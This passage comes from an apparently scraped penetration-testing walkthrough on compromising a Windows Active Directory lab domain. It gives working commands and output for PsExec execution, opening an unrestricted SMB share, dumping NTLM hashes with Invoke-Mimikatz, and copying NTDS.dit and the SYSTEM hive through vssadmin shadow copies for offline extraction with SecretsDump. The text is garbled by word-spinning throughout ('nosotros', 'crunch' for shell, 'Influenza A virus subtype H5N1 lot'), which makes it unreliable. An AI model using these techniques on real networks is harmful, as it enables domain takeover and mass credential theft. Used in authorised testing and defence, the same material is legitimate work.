After running the command our crunch hangs (sigh..). I played or hence alongside this for quite a chip as well as I found that without the "-c" (interactive mode) parameter the crunch does non hang but the command does non execute correctly also if you lot don't grouping your commands inward a bat file hence it volition alone execute the outset 1 before hanging. Just to hold upward clear, this number alone hap when executing incognito through PsExec.
Although it is quite an ugly solution, in 1 trial nosotros log dorsum inward to the machine nosotros tin run into that our batch script ran correctly.
If anyone tin figure out a to a greater extent than elegant way to execute the incognito command, definitely instruct out a comment!
File Transfers:
Obviously I guide maintain gone a chip tardily on myself, using the "put" command inward Impacket's PsExec. Generally a expert approach would hold upward to download whatever files you lot may demand onto the pin box, you lot tin utilization PowerShell's WebClient or something similar bitsadmin. For some ideas, guide maintain a await at Parvez post here. Once the files are inward house you lot tin just create an unrestricted Windows part as well as mountain that from the host behind the pivot. You tin run into some illustration syntax below.
# Create an unrestricted share. C:\Users\asenath.waite> md C:\Users\asenath.waite\Desktop\test C:\Users\asenath.waite> echo Hello > C:\Users\asenath.waite\Desktop\test\test.txt C:\Users\asenath.waite> net part SomeShare=C:\Users\asenath.waite\Desktop\test /grant:everyone,full SomeShare was shared successfully. C:\Users\asenath.waite> net share Share holler Resource Remark ------------------------------------------------------------------------------- C$ C:\ Default part IPC$ Remote IPC ADMIN$ C:\Windows Remote Admin SomeShare C:\Users\asenath.waite\Desktop\test The command completed successfully. # On the remote host uncomplicated mountain the share. C:\Users\belial> net utilization \\10.0.0.129\SomeShare The command completed successfully. C:\Users\belial> type \\10.0.0.129\SomeShare\test.txt Hello # Unmount. C:\Users\belial> net utilization \\10.0.0.129\SomeShare /delete \\10.0.0.129\SomeShare was deleted successfully. # Clean upward the share. C:\Users\asenath.waite> net part C:\Users\asenath.waite\Desktop\test /delete /yes Users guide maintain opened upward files on SomeShare. Continuing the performance volition forcefulness the files closed. SomeShare was deleted successfully. C:\Users\asenath.waite> rd /S /Q C:\Users\asenath.waite\Desktop\test
Compromising Redrum-DC
At this indicate nosotros guide maintain either found land text credentials for REDHOOK\Administrator or created our ain Doman Admin which agency that compromising the DC volition hold upward precisely the same equally the procedure nosotros used for "Client 2". To relieve my fingers some typing I won't become over the entire scenario again, you lot tin mix as well as check a number of technique which were shown previously. The 2 examples below are, again, doing something slightly different than the cases nosotros saw earlier.Socks Proxy & Impacket (WmiExec):
Remember that socks proxy nosotros laid upward earlier? We tin genuinely proxify almost everything nosotros demand to compromise the domain. The 1 caveat is that this evidently requires us to laid upward a socks proxy on the pivot. Here nosotros are using Impacket's WmiExec just to switch things upward a bit.
Simple right? Just don't rely on it to much inward illustration it is non an option!
Sysinternals (PsExec) & Invoke-Mimikatz:
Time to consummate our initial objective as well as instruct usable credentials for the REDHOOK\redhook.DA user account. This illustration is using Invoke-Mimikatz's mightiness to dump credentials on remote machines. Essentially, nosotros instruct a crunch on "Client 1" equally REDHOOK\Administrator as well as hence launch Mimikatz at the DC. We are assuming hither that REDHOOK\redhook.DA has an active session on the box.
The argue that I'm alone dumping hashes hither is that, due to enhanced protection features on 2k12 R2/Windows 8.1+, nosotros can't instruct clear text credentials for authenticated users. However, from the output nosotros tin run into that nosotros guide maintain managed to retrieve the REDHOOK\redhook.DA NTLM hash which volition hold upward to a greater extent than than plenty to authenticate to other machines inward the domain equally that user.
Notice that nosotros are just cypher padding the LM portion of the hash, it doesn't genuinely affair what nosotros pose there. We are for sure non restricted to Impacket here, Metasploit's PsExec volition also piece of work fine equally volition forging the NTLM hash of a command prompt using WCE or Mimikatz.
Pillaging NTDS
Influenza A virus subtype H5N1 lot of times extracting NTDS volition hold upward the concluding thing to exercise before rolling the Game Over credits. I highly recommend that you lot read Sean Metcalf post on doing this here which shows a number of different techniques both alongside local crunch access to the DC equally good equally remotely using WMI. In this department I volition briefly demo 2 ways nosotros tin range this.Volume Shadow Copy (Classic-Mode):
The most basic, living off the land, way to exercise this is to utilization vssadmin.
C:\> whoami redhook\redhook.da # Get the path to NTDS, it may non hold upward inward the C drive. C:\> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters System Schema Version REG_DWORD 0x45 Root Domain REG_SZ DC=RedHook,DC=local Configuration NC REG_SZ CN=Configuration,DC=RedHook,DC=local Machine DN Name REG_SZ CN=NTDS Settings,CN=REDRUM-DC,CN=Servers,CN=There-Be-Dragons,CN=Sites,CN= Configuration,DC=RedHook,DC=local DsaOptions REG_SZ 1 IsClone REG_DWORD 0x0 ServiceDll REG_EXPAND_SZ %systemroot%\system32\ntdsa.dll DSA Working Directory REG_SZ C:\Windows\NTDS DSA Database file REG_SZ C:\Windows\NTDS\ntds.dit Database backup path REG_SZ C:\Windows\NTDS\dsadata.bak Database log files path REG_SZ C:\Windows\NTDS Hierarchy Table Recalculation interval (minutes) REG_DWORD 0x2d0 Database logging/recovery REG_SZ ON DS Drive Mappings REG_MULTI_SZ c:\=\\?\Volume{1c6c559b-3db6-11e5-80ba-806e6f6e6963}\ DSA Database Epoch REG_DWORD 0x7983 Strict Replication Consistency REG_DWORD 0x1 Schema Version REG_DWORD 0x45 ldapserverintegrity REG_DWORD 0x1 Global Catalog Promotion Complete REG_DWORD 0x1 DSA Previous Restore Count REG_DWORD 0x1 # Create a shadow re-create of C. C:\> vssadmin create shadow /for=c: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2013 Microsoft Corp. Successfully created shadow re-create for 'c:\' Shadow Copy ID: {e0fd5b2d-b32d-4bba-89a2-efcf0b7b8fda} Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 # Copy out ntds as well as the organisation hive. C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit 1 file(s) copied. C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hive 1 file(s) copied.
After getting the files dorsum to the attacker's machine (many ways to exercise this, pick 1 hehe). We tin just utilization Impacket's SecretsDump locally as well as extract the contents. The output below is truncated for brevity.
Keep inward take away heed that NTDS tin literally incorporate thousands of user accounts as well as tin hold upward real large. Also, don't become exterior your remit(!), dumping NTDS is probable to brand Admins become absolutely ballistic!
Influenza A virus subtype H5N1 real similar approach tin hold upward used alongside Invoke-NinjaCopy, you lot tin run into an illustration of this inward Sean Metcalf's post.
Socks Proxy & Impacket (SecretsDump) (Easy-Mode):
Again, ridiculous equally it seems, if nosotros guide maintain a socks proxy laid upward on the pin nosotros tin just proxify SecretsDump as well as launch it against the DC using either land text credentials or a hash!
Final Thoughts
The primary finish of this post was to showcase a number of different techniques available to the attacker. The diverse examples given tin hold upward combined inward different ways equally required yesteryear the situation. Hopefully this has given the reader some ideas on how to displace or hence as well as pillage your way to DA!